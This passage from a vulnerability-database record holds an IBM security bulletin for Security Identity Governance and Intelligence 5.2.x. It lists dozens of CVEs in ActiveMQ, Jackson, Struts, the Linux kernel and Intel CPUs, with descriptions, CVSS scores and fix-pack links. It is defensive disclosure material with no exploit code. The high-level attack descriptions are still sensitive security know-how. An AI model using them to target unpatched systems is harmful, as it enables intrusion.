the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\n**CVEID:** [CVE-2016-0782](<https://vulners.com/cve/CVE-2016-0782>) \n**DESCRIPTION:** Apache ActiveMQ is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the web based administration console. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim''s Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim''s cookie-based authentication credentials. \nCVSS Base Score: 6.1 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/111420> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\n**CVEID:** [CVE-2016-0734](<https://vulners.com/cve/CVE-2016-0734>) \n**DESCRIPTION:** Apache ActiveMQ could allow a remote attacker to hijack the clicking action of the victim, caused by the failure to set the X-Frame-Options header in HTTP responses by the Administrative Web console. By persuading a victim to visit a malicious Web site, a remote attacker could exploit this vulnerability to hijack the victim''s click actions. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/111421> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)\n\n**CVEID:** [CVE-2016-3088](<https://vulners.com/cve/CVE-2016-3088>) \n**DESCRIPTION:** Apache ActiveMQ could allow a remote attacker to execute arbitrary code on the system, caused by an error in the Fileserver web application. By sending a specially crafted HTTP PUT request and an HTTP MOVE request, an attacker could exploit this vulnerability to create an arbitrary file and execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/113414> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n**CVEID:** [CVE-2016-6810](<https://vulners.com/cve/CVE-2016-6810>) \n**DESCRIPTION:** Apache ActiveMQ is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability in a specially-crafted URL to execute script in a victim''s Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim''s cookie-based authentication credentials. \nCVSS Base Score: 6.1 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/119699> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\n**CVEID:** [CVE-2016-9739](<https://vulners.com/cve/CVE-2016-9739>) \n**DESCRIPTION:** IBM Security Identity Manager Virtual Appliance stores user credentials in plain in clear text which can be read by a local user. \nCVSS Base Score: 6.2 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/119789> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\n**CVEID:** [CVE-2016-0357](<https://vulners.com/cve/CVE-2016-0357>) \n**DESCRIPTION:** IBM Security Identity Manager Virtual Appliance could allow a remote attacker to hijack the clicking action of the victim. By persuading a victim to visit a malicious Web site, a remote attacker could exploit this vulnerability to hijack the victim''s click actions and possibly launch further attacks against the victim. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/111896> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n**CVEID:** [CVE-2016-0340](<https://vulners.com/cve/CVE-2016-0340>) \n**DESCRIPTION:** IBM Security Identity Manager Virtual Appliance could allow a local user to take over a previously logged in user due to session expiration not being enforced. \nCVSS Base Score: 4.9 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/111780> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n**CVEID:** [CVE-2016-0339](<https://vulners.com/cve/CVE-2016-0339>) \n**DESCRIPTION:** IBM Security Identity Manager Virtual Appliance could allow an attacker with traffic records between a victim and the ISIM to spoof another user due to invalid session identifiers after the victim has logged out. \nCVSS Base Score: 5.6 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/111749> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n**CVEID:** [CVE-2016-0338](<https://vulners.com/cve/CVE-2016-0338>) \n**DESCRIPTION:** IBM Security Identity Manager Virtual Appliance could allow a local user to obtain sensitive information including passwords in cleartext by examining configuration files and/or running processes. \nCVSS Base Score: 6.2 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/111748> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\n**CVEID:** [CVE-2016-0330](<https://vulners.com/cve/CVE-2016-0330>) \n**DESCRIPTION:** IBM Security Identity Manager Virtual Appliance uses a weak password algorithm which allows users to create insecure passwords. An attacker could exploit this vulnerability to gain access to the system. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/111693> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\n**CVEID:** [CVE-2016-3092](<https://vulners.com/cve/CVE-2016-3092>) \n**DESCRIPTION:** Apache Tomcat is vulnerable to a denial of service, caused by an error in the Apache Commons FileUpload component. By sending file upload requests, an attacker could exploit this vulnerability to cause the server to become unresponsive. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/114336> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n**CVEID:** [CVE-2016-1000031](<https://vulners.com/cve/CVE-2016-1000031>) \n**DESCRIPTION:** Apache Commons FileUpload, as used in Novell NetIQ Sentinel and other products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/117957> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2014-0050](<https://vulners.com/cve/CVE-2014-0050>) \n**DESCRIPTION:** Apache Commons FileUpload, as used in Apache Tomcat, Solr, and other products is vulnerable to a denial of service, caused by the improper handling of Content-Type HTTP header for multipart requests by MultipartStream.java. An attacker could exploit this vulnerability using a specially crafted Content-Type header to cause the application to enter into an infinite loop. \nCVSS Base Score: 5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/90987> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n**CVEID:** [CVE-2013-0248](<https://vulners.com/cve/CVE-2013-0248>) \n**DESCRIPTION:** Apache Commons FileUpload could allow a local attacker to launch a symlink attack. Temporary files are created insecurely. A local attacker could exploit this vulnerability by creating a symbolic link from a temporary file to various files on the system, which could allow the attacker to overwrite arbitrary files on the system with elevated privileges. \nCVSS Base Score: 3.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/82618> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:M/Au:N/C:N/I:P/A:P)\n\n**CVEID:** [CVE-2018-7489](<https://vulners.com/cve/CVE-2018-7489>) \n**DESCRIPTION:** FasterXML jackson-databind could allow a remote attacker to execute arbitrary code on the system, caused by a deserialization flaw in the readValue method of the ObjectMapper. By sending specially crafted JSON input, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/139549> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n**CVEID:** [CVE-2018-5968](<https://vulners.com/cve/CVE-2018-5968>) \n**DESCRIPTION:** FasterXML jackson-databind could allow a remote attacker to execute arbitrary code on the system, caused by deserialization flaws. By using two different gadgets that bypass a blocklist, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/138088> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n**CVEID:** [CVE-2017-7525](<https://vulners.com/cve/CVE-2017-7525>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a deserialization flaw within the Jackson JSON library in the readValue method of the ObjectMapper. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/134639> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2017-17485](<https://vulners.com/cve/CVE-2017-17485>) \n**DESCRIPTION:** Jackson-databind could allow a remote attacker to execute arbitrary code on the system, caused by a flaw in the default-typing feature. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/137340> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2017-15095](<https://vulners.com/cve/CVE-2017-15095>) \n**DESCRIPTION:** Jackson Library could allow a remote attacker to execute arbitrary code on the system, caused by a deserialization flaw in the readValue() method of the ObjectMapper. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/135123> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2014-0114](<https://vulners.com/cve/CVE-2014-0114>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to restrict the setting of Class Loader attributes. An attacker could exploit this vulnerability using the class parameter of an ActionForm object to manipulate the ClassLoader and execute arbitrary code on the system. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/92889> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n**CVEID:** [CVE-2018-1000199](<https://vulners.com/cve/CVE-2018-1000199>) \n**DESCRIPTION:** Linux Kernel is vulnerable to a denial of service, caused by a ptrace() error handling flaw. By invoking the modify_user_hw_breakpoint() function, a local attacker could exploit this vulnerability to cause the kernel to crash. \nCVSS Base Score: 6.2 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/142654> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n**CVEID:** [CVE-2018-8897](<https://vulners.com/cve/CVE-2018-8897>) \n**DESCRIPTION:** Multiple operating systems could allow a local authenticated attacker to gain elevated privileges on the system, caused by developer interpretation of hardware debug exception documentation for the MOV to SS and POP SS instructions. An attacker could exploit this vulnerability using operating system APIs to obtain sensitive memory information or control low-level operating system functions and other unexpected behavior. \nCVSS Base Score: 7 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/142242> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2018-1091](<https://vulners.com/cve/CVE-2018-1091>) \n**DESCRIPTION:** Linux Kernel is vulnerable to a denial of service, caused by a missing processor feature check in the flush_tmregs_to_thread function. A local attacker could exploit this vulnerability to cause the guest kernel to crash. \nCVSS Base Score: 6.2 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/140892> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n**CVEID:** [CVE-2018-1087](<https://vulners.com/cve/CVE-2018-1087>) \n**DESCRIPTION:** Linux Kernel could allow a local attacker to gain elevated privileges on the system, caused by the improper handling of exceptions delivered after a stack switch operation using the MOV to SS and POP SS instructions by the KVM hypervisor. An attacker could exploit this vulnerability to gain elevated privileges or cause the guest to crash. \nCVSS Base Score: 8.4 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/142976> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2018-1068](<https://vulners.com/cve/CVE-2018-1068>) \n**DESCRIPTION:** Linux Kernel could allow a local authenticated attacker to gain elevated privileges on the system, caused by an error in the implementation of 32 bit syscall interface. An attacker could exploit this vulnerability to gain root privileges on the system. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/140403> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2017-16939](<https://vulners.com/cve/CVE-2017-16939>) \n**DESCRIPTION:** Linux Kernel could allow a remote attacker to gain elevated privileges on the system, caused by an use-after-free in the Netlink socket subsystem XFRM. By sending a specially-crafted request, an attacker could exploit this vulnerability to gain privileges. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/135317> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2018-10915](<https://vulners.com/cve/CVE-2018-10915>) \n**DESCRIPTION:** PostgreSQL could allow a remote attacker to bypass security restrictions, caused by an issue with improperly resting internal state in between connections in the libpq library. By sending a specially-crafted request, an attacker could exploit this vulnerability to bypass client-side connection security features. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148225> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)\n\n**CVEID:** [CVE-2018-5740](<https://vulners.com/cve/CVE-2018-5740>) \n**DESCRIPTION:** ISC BIND is vulnerable to a denial of service, caused by a defect in the deny-answer-aliases feature. By triggering this defect, a remote attacker could exploit this vulnerability to cause an INSIST assertion failure in name.c. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148131> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n**CVEID:** [CVE-2018-3693](<https://vulners.com/cve/CVE-2018-3693>) \n**DESCRIPTION:** Intel Haswell Xeon, AMD PRO and ARM Cortex A57 CPUs could allow a local authenticated attacker to obtain sensitive information, caused by a bounds check bypass in the CPU speculative branch instruction execution feature. By conducting targeted cache side-channel attacks, an attacker could exploit this vulnerability to cross the syscall boundary and read data from the CPU virtual memory. \nCVSS Base Score: 7.1 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/146191> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N)\n\n**CVEID:** [CVE-2018-3646](<https://vulners.com/cve/CVE-2018-3646>) \n**DESCRIPTION:** Multiple Intel CPU''s could allow a local attacker to obtain sensitive information, caused by a flaw in the CPU speculative branch instruction execution feature. By conducting targeted cache side-channel attacks and via a terminal page fault, an attacker with guest OS privilege could exploit this vulnerability to leak information residing in the L1 data cache and read data belonging to different security contexts. \nCVSS Base Score: 7.1 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148319> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N)\n\n**CVEID:** [CVE-2018-3620](<https://vulners.com/cve/CVE-2018-3620>) \n**DESCRIPTION:** Multiple Intel CPU''s could allow a local attacker to obtain sensitive information, caused by a flaw in the CPU speculative branch instruction execution feature. By conducting targeted cache side-channel attacks and via a terminal page fault, an attacker could exploit this vulnerability to leak information residing in the L1 data cache and read data belonging to different security contexts. Note: This vulnerability is also known as the \"L1 Terminal Fault (L1TF)\" or \"Foreshadow\" attack. \nCVSS Base Score: 7.1 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148318> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N)\n\n**CVEID:** [CVE-2018-1944](<https://vulners.com/cve/CVE-2018-1944>) \n**DESCRIPTION:** IBM Security Identity Governance Virtual Appliance contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. \nCVSS Base Score: 5.1 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/153386> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\n**CVEID:** [CVE-2018-1945](<https://vulners.com/cve/CVE-2018-1945>) \n**DESCRIPTION:** IBM Security Identity Governance Virtual Appliance could allow a remote attacker to hijack the clicking action of the victim. By persuading a victim to visit a malicious Web site, a remote attacker could exploit this vulnerability to hijack the victim's click actions and possibly launch further attacks against the victim. \nCVSS Base Score: 6.1 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/153387> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\n**CVEID:** [CVE-2017-7957](<https://vulners.com/cve/CVE-2017-7957>) \n**DESCRIPTION:** XStream is vulnerable to a denial of service, caused by the improper handling of attempts to create an instance of the primitive type ''void'' during unmarshalling. A remote attacker could exploit this vulnerability to cause the application to crash. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/125800> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n**CVEID:** [CVE-2016-3674](<https://vulners.com/cve/CVE-2016-3674>) \n**DESCRIPTION:** XStream could allow a remote attacker to obtain sensitive information, caused by an error when processing XML external entities. By sending specially-crafted XML data, an attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/111806> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\n**CVEID:** [CVE-2013-7285](<https://vulners.com/cve/CVE-2013-7285>) \n**DESCRIPTION:** XStream could allow a remote attacker to execute arbitrary code on the system, caused by an error in the XMLGenerator API. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause the application to crash. \nCVSS Base Score: 6.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/90229> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:P)\n\n**CVEID:** [CVE-2018-1946](<https://vulners.com/cve/CVE-2018-1946>) \n**DESCRIPTION:** IBM Security Identity Governance Virtual Appliance supports interaction between multiple actors and allows those actors to negotiate which algorithm should be used as a protection mechanism such as encryption or authentication, but it does not select the strongest algorithm that is available to both parties. \nCVSS Base Score: 5.9 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/153388> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\n**CVEID:** [CVE-2018-1947](<https://vulners.com/cve/CVE-2018-1947>) \n**DESCRIPTION:** IBM Security Identity Governance Virtual Appliance is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. \nCVSS Base Score: 6.1 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/153427> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\n**CVEID:** [CVE-2018-1948](<https://vulners.com/cve/CVE-2018-1948>) \n**DESCRIPTION:** IBM Security Identity Governance Virtual Appliance does not set the secure attribute on authorization tokens or session cookies. Attackers may be able to get the cookie values by sending a http:// link to a user or by planting this link in a site the user goes to. The cookie will be sent to the insecure link and the attacker can then obtain the cookie value by snooping the traffic. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/153428> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)\n\n**CVEID:** [CVE-2018-1949](<https://vulners.com/cve/CVE-2018-1949>) \n**DESCRIPTION:** IBM Security Identity Governance Virtual Appliance discloses sensitive information to unauthorized users. The information can be used to mount further attacks on the system. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/153429> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)\n\n**CVEID:** [CVE-2018-1950](<https://vulners.com/cve/CVE-2018-1950>) \n**DESCRIPTION:** IBM Security Identity Governance Virtual Appliance generates an error message that includes sensitive information about its environment, users, or associated data which could be used in further attacks against the system. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/153430> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)\n\n## Affected Products and Versions\n\nIBM Security Identity Governance and Intelligence (IGI) 5.2, 5.2.1, 5.2.2, 5.2.2.1, 5.2.3, 5.2.3.1, 5.2.3.2, 5.2.4, 5.2.4.1\n\n## Remediation/Fixes\n\nProduct Name\n\n| VRMF | First Fix \n---|---|--- \nIGI | 5.2 | [5.2.5.0-ISS-ISIG-VA-FP0000](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Tivoli/IBM+Security+Identity+Governance&release=5.2.5.0&platform=Linux&function=all>) \nIGI | 5.2.1 | [5.2.5.0-ISS-ISIG-VA-FP0000](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Tivoli/IBM+Security+Identity+Governance&release=5.2.5.0&platform=Linux&function=all>) \nIGI | 5.2.2 | [5.2.5.0-ISS-ISIG-VA-FP0000](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Tivoli/IBM+Security+Identity+Governance&release=5.2.5.0&platform=Linux&function=all>) \nIGI | 5.2.2.1 | [5.2.5.0-ISS-ISIG-VA-FP0000](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Tivoli/IBM+Security+Identity+Governance&release=5.2.5.0&platform=Linux&function=all>) \nIGI | 5.2.3 | [5.2.5.0-ISS-ISIG-VA-FP0000](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Tivoli/IBM+Security+Identity+Governance&release=5.2.5.0&platform=Linux&function=all>) \nIGI | 5.2.3.1 | [5.2.5.0-ISS-ISIG-VA-FP0000](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Tivoli/IBM+Security+Identity+Governance&release=5.2.5.0&platform=Linux&function=all>) \nIGI | 5.2.3.2 | [5.2.5.0-ISS-ISIG-VA-FP0000](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Tivoli/IBM+Security+Identity+Governance&release=5.2.5.0&platform=Linux&function=all>) \nIGI | 5.2.4 | [5.2.5.0-ISS-ISIG-VA-FP0000](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Tivoli/IBM+Security+Identity+Governance&release=5.2.5.0&platform=Linux&function=all>) \nIGI | 5.2.4.1 | [5.2.5.0-ISS-ISIG-VA-FP0000](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Tivoli/IBM+Security+Identity+Governance&release=5.2.5.0&platform=Linux&function=all>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-02-18T14:10:01", "type": "ibm", "title": "Security Bulletin: IBM has announced a release for IBM Security Identity Governance and Intelligence in response to multiple security vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2011-2730", "CVE-2011-4905", "CVE-2012-5784", "CVE-2012-6092", "CVE-2012-6551", "CVE-2013-0248", "CVE-2013-1879", "CVE-2013-1880", "CVE-2013-2172", "CVE-2013-2186", "CVE-2013-3060", "CVE-2013-4152", "CVE-2013-4517", "CVE-2013-6429", "CVE-2013-7285", "CVE-2013-7315", "CVE-2014-0050", "CVE-2014-0054", "CVE-2014-0114", "CVE-2014-1904", "CVE-2014-3576", "CVE-2014-3596", "CVE-2014-3600", "CVE-2014-3612", "CVE-2014-8110", "CVE-2015-1830", "CVE-2015-5182", "CVE-2015-5183", "CVE-2015-5184", "CVE-2015-5237", "CVE-2015-5254", "CVE-2015-6524", "CVE-2016-0330", "CVE-2016-0338", "CVE-2016-0339", "CVE-2016-0340", "CVE-2016-0357", "CVE-2016-0734", "CVE-2016-0782", "CVE-2016-1000031", "CVE-2016-3088", "CVE-2016-3092", "CVE-2016-3674", "CVE-2016-6810", "CVE-2016-9739", "CVE-2016-9878", "CVE-2017-15095", "CVE-2017-16939", "CVE-2017-17485", "CVE-2017-7525", "CVE-2017-7957", "CVE-2018-0124", "CVE-2018-0125", "CVE-2018-1000199", "CVE-2018-1068", "CVE-2018-1087", "CVE-2018-1091", "CVE-2018-10915", "CVE-2018-1270", "CVE-2018-1271", "CVE-2018-1272", "CVE-2018-1944", "CVE-2018-1945", "CVE-2018-1946", "CVE-2018-1947", "CVE-2018-1948", "CVE-2018-1949", "CVE-2018-1950", "CVE-2018-3620", "CVE-2018-3646", "CVE-2018-3693", "CVE-2018-5740", "CVE-2018-5968", "CVE-2018-7489", "CVE-2018-8897"], "modified": "2019-02-18T14:10:01", "id": "CD8271F1E3A620207AA3EAC35F944E1453EFEBC4728A88B9C3D9D0DA7F511F56", "href": "https://www.ibm.com/support/pages/node/872142", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debiancve": [{"lastseen": "2023-03-10T06:09:35", "description": "Spring Framework, version 5.1, versions 5.0.x prior to 5.0.10, versions 4.3.x prior to 4.3.20, and older unsupported versions on the 4.2.x branch provide support for range requests when serving static resources through the ResourceHttpRequestHandler, or starting in 5.0 when an annotated controller 